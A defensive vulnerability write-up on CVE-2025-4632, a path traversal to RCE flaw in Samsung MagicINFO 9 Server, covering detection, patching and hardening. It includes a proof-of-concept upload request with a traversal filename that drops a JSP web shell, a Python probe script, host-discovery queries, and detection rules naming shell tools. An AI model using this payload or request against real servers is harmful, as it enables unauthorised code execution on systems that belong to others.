Vulnerability Analysis

CVE-2025-4632: Samsung MagicINFO 9 Server Path Traversal → RCE & How to Fix It

Executive Summary

CVE-2025-4632 is a critical path traversal vulnerability (CVSS 9.8) in Samsung MagicINFO 9 Server — the content management platform used to push media to digital signage displays worldwide. Unauthenticated remote attackers can exploit the flaw to write arbitrary files anywhere on the underlying server, which trivially escalates to remote code execution by dropping a web shell. Exploitation is confirmed in the wild, with multiple threat actor groups — including operators of the Mirai botnet and the DragonForce ransomware operation — actively targeting unpatched instances. CISA added CVE-2025-4632 to its Known Exploited Vulnerabilities (KEV) catalog and mandated remediation across federal agencies. Patch immediately to version 21.1052 or later.


1. What Is This Vulnerability?

Background

Samsung MagicINFO 9 Server is an enterprise content management platform that lets administrators schedule and distribute media (images, video, HTML) to a fleet of networked digital signage displays. It exposes a web-based management console and a REST/HTTP API used by display devices to fetch content and by admins to upload new assets.

The server includes a file upload endpoint designed to accept media files for distribution. CVE-2025-4632 arises because that endpoint trusts a user-supplied filename (or path) parameter without adequately sanitizing path traversal sequences such as ../ (dot-dot-slash). This means an attacker who crafts a multipart HTTP POST request can redirect the file write to any directory accessible by the server process — which typically runs with elevated (SYSTEM-level) privileges on Windows.

Technical Breakdown

The root cause is classic CWE-22: Improper Limitation of a Pathname to a Restricted Directory — the server constructs a target file path by concatenating a base upload directory with a caller-provided filename, but fails to canonicalize or validate the resulting path before writing the file.

Simplified vulnerable path construction (pseudocode):

// VULNERABLE — user input not sanitized
String uploadDir = "C:\\MagicINFO\\upload\\";
String filename  = request.getParameter("filename");   // attacker-controlled
String target    = uploadDir + filename;               // traversal possible

FileOutputStream fos = new FileOutputStream(target);
fos.write(requestBody);
fos.close();

If filename is set to ../../../../webapps/ROOT/shell.jsp, the target resolves to a path inside the web application root, and the uploaded file becomes a live JSP web shell served by the application container.

No authentication is required. The upload endpoint is accessible without a valid session token, making this a zero-click, zero-auth remote exploit.

Note: CVE-2025-4632 is a patch bypass for CVE-2024-7399, an earlier path traversal in the same product patched in August 2024. Samsung's initial fix was incomplete — researchers found that attackers could still bypass it using alternate encoding or directory structures, prompting a second, more comprehensive fix released May 13, 2025.

Attack Vector

A typical exploitation sequence looks like this:

  1. Reconnaissance: Attacker scans the internet (e.g., via Shodan/Censys) for hosts exposing the MagicINFO management port (default: 7001/TCP or 80/443 if reverse-proxied).
  2. Initial write: Attacker sends a crafted multipart POST request to the upload endpoint with a path-traversal filename pointing to the web root.
  3. Web shell placement: The JSP/ASPX payload is written to a publicly accessible directory.
  4. Code execution: Attacker issues HTTP requests to the placed shell, executing OS commands as the server process user (often SYSTEM on Windows).
  5. Post-exploitation: Download and execute secondary payloads — Mirai agents, ransomware loaders, or lateral movement tools.

Proof-of-concept HTTP request (sanitized for demonstration):

POST /MagicInfo/fileUpload HTTP/1.1
Host: target.example.com:7001
Content-Type: multipart/form-data; boundary=----Boundary

------Boundary
Content-Disposition: form-data; name="Filedata"; filename="../../../../webapps/ROOT/pwn.jsp"
Content-Type: application/octet-stream

<%@ page import="java.io.*,java.util.*"%>
<%
  String cmd = request.getParameter("cmd");
  Process p = Runtime.getRuntime().exec(cmd);
  // ... output to response
%>
------Boundary--

Real-World Impact

Huntress Threat Intelligence documented three confirmed post-exploitation incidents involving CVE-2025-4632:

  • Incidents 1 & 2: Identical command sets downloading secondary binaries (srvany.exe, services.exe) — behavior consistent with persistence installation and process masquerading.
  • Incident 3: Reconnaissance commands executed, suggesting a staging phase before further exploitation.

Multiple Mirai botnet variants were observed leveraging the vulnerability to absorb MagicINFO servers into DDoS infrastructure. The DragonForce ransomware group was linked to separate campaigns using the related CVE-2024-57726/57728 (SimpleHelp) vulnerabilities in overlapping infrastructure, suggesting organized threat actor interest in unmanaged server software.


2. Who Is Affected?

Component                          Vulnerable Versions
Samsung MagicINFO 9 Server         All versions prior to 21.1052
Samsung MagicINFO 8 and earlier    Not officially supported; presumed vulnerable or unsupported

Risk factors that increase exposure:

  • MagicINFO management interface exposed directly to the internet (ports 7001, 8080, 80, 443)
  • Running the service under a high-privileged user account (SYSTEM/Administrator)
  • No network segmentation between signage management network and internal LAN
  • Legacy deployments that applied the CVE-2024-7399 patch but did not upgrade to 21.1052

Internet exposure: Censys and Shodan scans performed around the time of disclosure found thousands of MagicINFO instances accessible from the public internet, concentrated in retail, hospitality, healthcare, and government sectors — all prime targets for botnet operators or ransomware groups seeking privileged pivot points.


3. How to Detect It (Testing)

Manual Testing Steps

  1. Identify exposed instances: Search your network for hosts listening on ports commonly used by MagicINFO (7001, 8080, 80/443 with /MagicInfo path). Use your existing asset inventory or run: nmap -p 7001,8080 --open -sV <subnet>
  2. Check version: Navigate to the MagicINFO admin console → Help → About. Note the build/version string and compare against 21.1052.
  3. Attempt an unauthenticated probe (authorized test only): Without logging in, issue a GET to /MagicInfo/ and observe whether you receive a login page or direct application response. Confirm the server version in HTTP response headers (X-MagicInfo-Version or similar).
  4. Path traversal indicator (authorized pentest only): With written authorization, use a controlled payload that writes to an innocuous readable path and verify whether the file appears — if it does, the host is exploitable and must be treated as unpatched.
  5. Check for existing compromise: Look for unexpected .jsp, .jspx, .war, or executable files in the web application directories (webapps/ROOT, webapps/MagicInfo).

Automated Scanning

Nuclei (ProjectDiscovery):

# A community-contributed Nuclei template exists for CVE-2025-4632
nuclei -t cves/2025/CVE-2025-4632.yaml -u https://target.example.com:7001

The template is tracked at projectdiscovery/nuclei-templates#12946. Pull the latest template repository before running.

Shodan/Censys (asset discovery):

# Shodan query to find exposed MagicINFO instances
http.title:"MagicInfo" port:7001

# Censys equivalent
services.http.response.html_title: "MagicInfo"

Nessus / Tenable: Plugins for CVE-2025-4632 and CVE-2024-7399 are available in the Tenable plugin feed. Run a credentialed scan targeting MagicINFO hosts and filter for plugin IDs covering these CVEs.

Code Review Checklist (if you self-host or have source access)

  • Verify file upload handler canonicalizes the resolved path (File.getCanonicalPath() in Java) before writing
  • Confirm resolved path starts with the expected upload directory prefix — reject if not
  • Ensure the upload endpoint requires a valid authenticated session token
  • Check that the server process account is least-privilege (not SYSTEM/root)
  • Confirm uploaded files are written outside the web application document root
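The vulnerable Java pseudocode in section 1 concatenates a base directory with a caller-supplied filename and writes; the checklist above is the inverse of that mistake. The following is an added example written for this page (it is not Samsung's code and not how MagicINFO itself implements uploads), in Python rather than Java so it can be run as-is. The upload directory, the session tokens, the function names (`resolve_upload_path`, `handle_upload`, `run_scenarios`) and every filename in the scenarios are constructed for illustration. It shows the checklist items in order: decode once, canonicalize with realpath, confirm containment with commonpath (a plain string-prefix test would accept a sibling directory that merely shares the prefix), and require a session before any of that runs.

```python
import os
import shutil
import tempfile
import urllib.parse


class UnsafeFilename(ValueError):
    """Raised when a caller-supplied filename would escape the upload directory."""


def resolve_upload_path(upload_dir: str, filename: str) -> str:
    """Return the canonical absolute path a file may be written to, or raise UnsafeFilename.

    Order matters: decode, then canonicalise, then check containment. Validating
    before decoding is how an incomplete fix gets bypassed by encoded input.
    """
    if not filename:
        raise UnsafeFilename("empty filename")
    decoded = urllib.parse.unquote(filename)          # one decode: %2e%2e%2f becomes ../
    if "\x00" in decoded:
        raise UnsafeFilename("NUL byte in filename")
    decoded = decoded.replace("\\", "/")              # treat Windows separators like '/'
    base = os.path.realpath(upload_dir)
    # os.path.join drops `base` entirely when `decoded` is absolute ("/etc/x");
    # the containment check below still rejects that case.
    target = os.path.realpath(os.path.join(base, decoded))
    try:
        inside = os.path.commonpath([base, target]) == base
    except ValueError:                                # different drives on Windows
        inside = False
    if not inside or target == base:
        raise UnsafeFilename(f"path escapes upload directory: {filename!r}")
    return target


def is_safe_filename(upload_dir: str, filename: str) -> bool:
    """Boolean wrapper around resolve_upload_path for use in tests and filters."""
    try:
        resolve_upload_path(upload_dir, filename)
        return True
    except UnsafeFilename:
        return False


def handle_upload(upload_dir, session_token, filename, body, valid_tokens):
    """Hardened upload handler in miniature: authenticate, contain the path, then write.

    Returns (http_status, written_path): 401 for a missing or invalid session,
    400 for a filename that escapes upload_dir, 201 on success.
    """
    if session_token is None or session_token not in valid_tokens:
        return 401, None
    try:
        target = resolve_upload_path(upload_dir, filename)
    except UnsafeFilename:
        return 400, None
    os.makedirs(os.path.dirname(target), exist_ok=True)   # subdirectory is inside base by construction
    with open(target, "wb") as fh:
        fh.write(body)
    return 201, target


def run_scenarios() -> dict:
    """Exercise handle_upload against a throwaway upload directory.

    Returns the HTTP status per scenario plus whether the one legitimate upload
    landed inside the upload directory. All filenames and tokens are constructed.
    """
    upload_dir = tempfile.mkdtemp(prefix="magicinfo-upload-")   # hypothetical upload root
    valid_tokens = {"constructed-session-token"}
    scenarios = {
        "no_auth":   ("banner.png", None),
        "traversal": ("../../../../webapps/ROOT/shell.jsp", "constructed-session-token"),
        "encoded":   ("%2e%2e%2f%2e%2e%2fshell.jsp", "constructed-session-token"),
        "backslash": ("..\\..\\shell.jsp", "constructed-session-token"),
        "absolute":  ("/tmp/shell.jsp", "constructed-session-token"),
        "legit":     ("campaign/2025/banner.png", "constructed-session-token"),
    }
    results = {}
    try:
        for name, (filename, token) in scenarios.items():
            status, path = handle_upload(upload_dir, token, filename, b"constructed bytes", valid_tokens)
            results[name] = status
            if name == "legit":
                results["legit_inside_upload_dir"] = (
                    path is not None and os.path.isfile(path)
                    and path.startswith(os.path.realpath(upload_dir) + os.sep)
                )
    finally:
        shutil.rmtree(upload_dir, ignore_errors=True)
    return results


if __name__ == "__main__":
    for scenario, outcome in run_scenarios().items():
        print(f"{scenario:<26} {outcome}")
```

The handler checks the session before it even looks at the filename, so an unauthenticated request never reaches the path logic; the four escaping filenames (plain, percent-encoded, backslash-separated and absolute) are all rejected by the same realpath-plus-commonpath test rather than by a blocklist of known patterns, and only the ordinary upload under `campaign/2025/` is written.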

4. How to Fix It (Mitigation)

Step-by-Step Remediation

  1. Upgrade to MagicINFO 9 Server version 21.1052 or later. This is the only complete fix. Download from the official Samsung MagicINFO support portal or contact your Samsung reseller.
  2. Verify the upgrade: After installation, confirm the version string in the admin console reflects 21.1052+. Check that the changelog confirms inclusion of the CVE-2025-4632 fix.
  3. Restrict network access immediately (stop-gap while patching):
    • Place a firewall rule blocking all external/untrusted network access to MagicINFO ports (7001, 8080).
    • Limit access to management interfaces to trusted administrator IP ranges only.
    • If internet exposure is required for remote device management, move it behind a VPN or Zero Trust Network Access (ZTNA) gateway.
  4. Audit for existing compromise: Before or immediately after patching, inspect the web application directories for unexpected files, especially .jsp/.jspx files not part of the original installation.
  5. Rotate credentials and review service accounts: If compromise is suspected, rotate all MagicINFO admin credentials and review/restrict the OS-level service account.
  6. Re-deploy to a known clean state if compromise is confirmed — do not assume patching alone restores integrity once a web shell has been placed.

Configuration Hardening

Setting             Recommended Configuration
Service account     Dedicated low-privilege account — not SYSTEM/Administrator
Network exposure    Internal network only; external access via VPN or ZTNA
Upload directory    Outside web root; enforce via OS-level permissions
TLS                 Enforce HTTPS; disable HTTP on management ports
Admin access        Restrict by IP allowlist; enable MFA if supported
Log retention       Enable and centralize access logs for the management interface

5. How to Test the Fix (Validation)

Regression Test Scenarios

  • Scenario A — Patch applied successfully: Log into the admin console and confirm version ≥ 21.1052. Run the Nuclei CVE-2025-4632 template against the host and confirm no vulnerability detected.
  • Scenario B — Upload endpoint no longer accepts traversal: In an authorized test environment, replay a path-traversal upload request (from an unauthenticated session). Confirm the server returns a 400/403 error and does not write the file to the traversed path.
  • Scenario C — Normal upload functionality intact: Log in as an authorized admin and upload a valid media file. Confirm it is stored in the expected upload directory and is distributed to test displays correctly.
  • Scenario D — Network restriction effective: From an external host, attempt to reach the MagicINFO management port. Confirm connection is refused or timed out.

Security Test Case: Verify Vulnerability Is Closed

Test Case ID:   SEC-2025-4632-01
Precondition:   Patch 21.1052 applied; test environment authorized
Actor:          Unauthenticated attacker (penetration tester)
Steps:
  1. Issue a multipart POST to /MagicInfo/fileUpload without an auth token
     with filename=../../../../webapps/ROOT/test-probe.jsp
  2. Attempt to GET /test-probe.jsp from the web root
Expected Result:
  - Server returns HTTP 400, 403, or 401 on the upload request
  - The file does NOT appear in the web root
  - No JSP execution occurs
Pass/Fail:      Pass if file is NOT created; Fail if file is accessible

Automated Test (Python, for authorized lab use)

import sys
import requests

TARGET = "http://your-test-magicinfo-host:7001"        # authorized lab host only
PROBE_FILENAME = "../../../../webapps/ROOT/cve_2025_4632_probe.txt"
PROBE_CONTENT  = b"CVE-2025-4632-TEST-PROBE"
TIMEOUT = 10


def run_probe() -> int:
    """Return 0 (pass), 1 (fail: traversal write succeeded) or 2 (inconclusive: request error)."""
    # Step 1: Attempt path traversal upload (unauthenticated; no session cookie is sent)
    try:
        resp = requests.post(
            f"{TARGET}/MagicInfo/fileUpload",
            files={"Filedata": (PROBE_FILENAME, PROBE_CONTENT, "text/plain")},
            timeout=TIMEOUT,
        )
        print(f"Upload response: {resp.status_code}")

        # Step 2: Check whether the probe file was placed in the web root
        probe_resp = requests.get(f"{TARGET}/cve_2025_4632_probe.txt", timeout=TIMEOUT)
    except requests.RequestException as exc:
        print(f"[ERROR] Request failed, result inconclusive: {exc}")
        return 2

    if probe_resp.status_code == 200 and PROBE_CONTENT in probe_resp.content:
        print("[FAIL] VULNERABLE — path traversal write succeeded")
        return 1
    print("[PASS] Traversal blocked — upload rejected or file not accessible")
    return 0


if __name__ == "__main__":
    sys.exit(run_probe())

6. Prevention & Hardening

Best Practices

  • Never expose digital signage management interfaces to the internet. These platforms were designed for internal LAN/WAN use. If remote administration is required, use a VPN, ZTNA, or dedicated jump host.
  • Patch promptly for digital signage and "secondary" infrastructure. MagicINFO and similar platforms are commonly overlooked during vulnerability management cycles because they are not considered "critical servers" — but they run on high-privilege accounts and maintain persistent network connectivity, making them valuable pivot points.
  • Apply vendor updates systematically. Samsung released both CVE-2024-7399 (August 2024) and CVE-2025-4632 (May 2025) as targeted patches — organizations that applied the CVE-2024-7399 patch but didn't follow up with 21.1052 remained vulnerable for nearly a year. Subscribe to vendor security advisories.
  • Enforce least privilege for service accounts. The Mirai exploitation was amplified by MagicINFO running as SYSTEM. A dedicated low-privilege service account limits the blast radius of any file-write exploitation.
  • Segment signage networks. Isolate digital signage management infrastructure from corporate LAN and OT/ICS networks. Even if a signage server is compromised, network segmentation limits lateral movement.

Monitoring & Detection

Watch for the following indicators of compromise (IoCs) and behavioral signals:

Detection Signal                                                               Description
New .jsp / .jspx files in webapps/ROOT                                         Unexpected web shell drop
Unauthenticated POST to /MagicInfo/fileUpload                                  Exploitation attempt
Outbound connections to unusual IPs/ports                                      Post-exploitation C2 or payload download
Execution of cmd.exe, powershell.exe, or wget/curl by the MagicINFO process    Web shell command execution
srvany.exe, services.exe appearing in MagicINFO directory                      Documented Huntress IoC
High-volume outbound UDP traffic from MagicINFO host                           Mirai botnet DDoS participation

SIEM/EDR detection query (Windows Event Logs):

EventID: 4688 (process creation)
ParentProcessName: *magicinfo* OR *tomcat*
NewProcessName: *cmd.exe* OR *powershell.exe* OR *wscript.exe*

File Integrity Monitoring: Configure FIM on the MagicINFO webapps directory to alert on any new or modified .jsp, .war, or .exe files.
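To show the detection table, the SIEM query and the FIM rule above as running logic, here is an added example (written for this page, not a Huntress, Samsung or vendor detection) that applies three of those signals to constructed data: the Tomcat-style access-log lines, the 4688 process-creation records and the file listings are all made up for the demonstration, and the rule names and function names (`scan_access_log`, `scan_process_events`, `new_web_files`) are this example's own. The access-log rule flags POSTs to the upload endpoint and any JSP served from outside the /MagicInfo/ application path; the process rule is the SIEM query from above expressed in code; the FIM helper reports files that appeared since a baseline, limited to the suffixes the rule names.

```python
import re

# Constructed sample Tomcat access-log lines (common log format; not from a real incident).
SAMPLE_ACCESS_LOG = """\
192.168.10.20 - admin [13/May/2025:09:58:11 +0000] "GET /MagicInfo/ HTTP/1.1" 200 4096
203.0.113.45 - - [13/May/2025:10:15:22 +0000] "POST /MagicInfo/fileUpload HTTP/1.1" 200 512
203.0.113.45 - - [13/May/2025:10:15:25 +0000] "GET /pwn.jsp HTTP/1.1" 200 87
192.168.10.20 - admin [13/May/2025:10:20:01 +0000] "GET /MagicInfo/images/logo.png HTTP/1.1" 200 2048
"""

# Constructed Windows Security 4688 (process creation) events, as a SIEM would normalise them.
SAMPLE_PROCESS_EVENTS = [
    {"EventID": 4688, "ParentProcessName": r"C:\MagicInfo\tomcat\bin\tomcat9.exe",
     "NewProcessName": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 4688, "ParentProcessName": r"C:\MagicInfo\tomcat\bin\tomcat9.exe",
     "NewProcessName": r"C:\Program Files\Java\bin\java.exe"},
    {"EventID": 4688, "ParentProcessName": r"C:\Windows\explorer.exe",
     "NewProcessName": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 4624, "ParentProcessName": "", "NewProcessName": ""},
]

ACCESS_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
UPLOAD_ENDPOINT = "/magicinfo/fileupload"      # compared case-insensitively
APP_ROOT_PREFIX = "/magicinfo/"                # the application's own context path
SUSPICIOUS_PARENTS = ("magicinfo", "tomcat")   # mirrors ParentProcessName: *magicinfo* OR *tomcat*
SUSPICIOUS_CHILDREN = ("cmd.exe", "powershell.exe", "wscript.exe")


def scan_access_log(text: str) -> list:
    """Apply the access-log rules from the detection table; returns alerts in log order."""
    alerts = []
    for line in text.splitlines():
        m = ACCESS_LINE.match(line)
        if not m:
            continue                                    # unparsable line: skip, never crash the pipeline
        path = m["path"].split("?", 1)[0].lower()       # ignore the query string when matching paths
        common = {"ip": m["ip"], "ts": m["ts"], "unauthenticated": m["user"] == "-", "line": line}
        if m["method"] == "POST" and path == UPLOAD_ENDPOINT:
            alerts.append({"rule": "upload-endpoint-post", **common})
        elif path.endswith((".jsp", ".jspx")) and not path.startswith(APP_ROOT_PREFIX):
            # A JSP served from the ROOT context rather than under /MagicInfo/ is the web-shell signal.
            alerts.append({"rule": "jsp-outside-app-root", **common})
    return alerts


def scan_process_events(events: list) -> list:
    """The SIEM query in code: 4688 where the parent is MagicINFO/Tomcat and the child is a shell or script host."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4688:
            continue
        parent = ev.get("ParentProcessName", "").lower()
        child = ev.get("NewProcessName", "").lower()
        if any(p in parent for p in SUSPICIOUS_PARENTS) and any(child.endswith(c) for c in SUSPICIOUS_CHILDREN):
            hits.append(ev)
    return hits


def new_web_files(baseline: set, current: set, suffixes=(".jsp", ".jspx", ".war", ".exe")) -> list:
    """Minimal FIM check: files present now but absent from the baseline, limited to the suffixes the rule names."""
    return sorted(f for f in current - baseline if f.lower().endswith(suffixes))


if __name__ == "__main__":
    for a in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"[{a['rule']}] {a['ip']} unauthenticated={a['unauthenticated']}: {a['line']}")
    for ev in scan_process_events(SAMPLE_PROCESS_EVENTS):
        print(f"[shell-from-magicinfo] {ev['ParentProcessName']} -> {ev['NewProcessName']}")
    print(new_web_files({"index.jsp", "logo.png"}, {"index.jsp", "logo.png", "pwn.jsp"}))
```

On the constructed data the two rules fire on the same external address within seconds of each other (an upload POST followed by a request for a JSP at the web root), which is the sequence worth correlating in a SIEM; the process rule matches only the cmd.exe spawned under the Tomcat service, not the one spawned by explorer.exe, and the FIM helper reports the new .jsp while ignoring other new files. Whether the `user` field is populated depends on how the container logs authentication, so treat the `unauthenticated` flag as a triage hint rather than proof.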

